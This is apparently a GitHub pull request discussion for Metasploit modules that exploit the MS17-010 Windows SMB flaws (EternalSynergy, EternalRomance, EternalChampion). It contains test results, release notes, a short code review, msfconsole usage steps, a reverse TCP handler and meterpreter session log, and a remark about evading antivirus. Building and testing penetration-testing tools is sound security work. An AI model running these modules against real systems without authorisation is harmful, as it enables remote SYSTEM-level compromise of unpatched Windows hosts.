MS17-010 EternalSynergy / EternalRomance / EternalChampion aux+exploit modules #9473
Conversation
YUS!
Hello again. :-)
@ctx['os'] = 'WIN7' | ||
@ctx['go_fish'] = true | ||
elsif os.starts_with? "Windows Server 2003 " | ||
@ctx['os'] = 'WIN2K3' |
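Review bot: the `elsif` line uses `starts_with?`, which is the ActiveSupport alias; core Ruby only provides `start_with?`, so this branch relies on ActiveSupport being loaded. Consider `start_with?` for portability. Also note the trailing space in `"Windows Server 2003 "`: a banner that reads exactly "Windows Server 2003" with nothing after it would not enter this branch and `@ctx['os']` would not be set to `'WIN2K3'`.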
Indentation
Success on Windows XP SP3 (x86) with Automatic targeting (unauthenticated).
Success on Windows Vista Home Premium (x86) with Automatic targeting (unauthenticated).
Fail on Windows Server 2003 SP2 with Automatic targeting (unauthenticated).
Fail on Windows XP Professional SP0 (x86) with Automatic targeting (unauthenticated).
Damn, thanks a bunch. As soon as I deployed this on my early morning pentest I owned AD in seconds 🥇
Success on Windows 2000 Professional SP4 (x86) with Automatic targeting (unauthenticated).
How can we merge your branch to help you with testing? Sorry, new to GitHub.
@bwatters-r7 very interested in all service packs of Server 2003 actually. Could have similar issues as XP did. @iNoSec something like (untested)
FYI, tests still running, but Win2003x86_SP0 succeeded. Win2003x64_SP1 failed; debug output:
Other tests still running.
Woops. Wrong key when adding x64 to dynamite list, try Win2003x64_SP1 again please.
Roger. The tests are scripted, but it will grab the most up-to-date version of the code for the PR, so your new push would have been used on the next OS. Here are the results so far:
@bwatters-r7 can you tell me how you added it to the framework, please?
@iNoSec something like (untested)
Or alternatively:
After checking the Win2008x86_SP1 VM, I noticed I forgot to disable Windows Firewall when I set it up originally. Disabled it, reset and re-ran all tests last night: Win2003x86_SP0
So we have just 3 more OSes to test to land this? |
Success on Windows 10 Enterprise 10240 x64 authenticated/native target
Success on Windows 10 Enterprise 10240 x86 authenticated/native target
I've confirmed Windows Vista x64 is working.
msf exploit(windows/smb/ms17_010_psexec) > exploit
[*] Started reverse TCP handler on 192.168.206.128:4444
meterpreter > getuid
Thanks for all the testing, folks! I think we can leave the remaining to-dos for the next PR. Let us know when you're ready to ship this, @zerosum0x0. 👍
@wvu-r7 Seems good to me
Release Notes
Auxiliary and exploit modules for EternalSynergy, EternalRomance, and EternalChampion have been added to the framework. The exploits/windows/smb/ms17_010_psexec module exploits SMB with vulnerabilities in MS17-010 to give you the ability to run any command as SYSTEM or stage Meterpreter. This exploit is more reliable than the EternalBlue exploit, but requires a named pipe.
As a general public service announcement: If you would like to use this module, you need to use a version of Metasploit that already has it packaged, or wait until your Linux distribution is shipping it. Just copying the module file will not work on an older version of Metasploit Framework. This is also a closed PR. If you have bugs, file them as new tickets. If you have general questions or need help, ask on IRC, slack, or in a help forum. You can find information on these channels at https://metasploit.com. Thanks!
@zerosum0x0 @bcoles @wvu-r7 @ronnieflip @mkienow-r7
MS17-010 Windows SMB Remote Command and Code Execution modules for all vulnerable targets Windows 2000 through 2016 (and of course the standard home/workstation counterparts).
Screenshots: https://twitter.com/zerosum0x0/status/957839430777057280
You can run any command as SYSTEM, or stage Meterpreter. Note: unlike EternalBlue, kernel shellcode is not used to stage Meterpreter, so you might have to evade your payloads.
This module is highly reliable and preferred over EternalBlue where a Named Pipe is accessible for anonymous logins (generally, everything pre-Vista, and relatively common for domain computers in the wild).
The exploit chain is an almost 1:1 skid port of @worawit's awesome zzz_exploit adaptation, which brings a few improvements over the original Eternal exploits. Instead of going for shellcode execution, it overwrites the SMB connection session structures to gain an Admin/SYSTEM session. The MSF module is leaner (stripped down packet count/padding), checks extra named pipes, sprinkles randomness where possible, and has Metasploit's psexec DCERPC implementation bolted onto it. For the last reason, Rex is used and not RubySMB.
Changes to MSF Lib
The exploit needs a smaller SMB Max Buffer Size than the hard-coded values in the Rex SMB proto client libraries. I exposed this as a public member that defaults to the old value. Existing code should not be broken.
Most of the exploit code is in a new mix-in (to be shared for the aux and exploit).
Disclaimer
This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Authors and project maintainers are not responsible or liable for misuse of the software. Use responsibly.
AV/Firewall Warning
Unlike EternalBlue, the exploit module will drop to disk (or use a PowerShell command).
Standard rules apply when it comes to AV/firewall for the exploit module. The command module should work fine though, try some of the following:
Test Progress
Should work on all unpatched versions of Windows 2000+ x86/x64.
Asking for help in testing thoroughly. Provide crash dumps and pcaps in case of failure. Exploit should virtually never crash post-Vista, and only in extremely rare circumstances for earlier versions.
set VERBOSE 1
set DBGTRACE 1
Todo
Not necessarily for this PR, but some ideas for improvements.
Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/windows/smb/ms17_010_psexec
use auxiliary/admin/smb/ms17_010_command
set VERBOSE 1
set DBGTRACE 1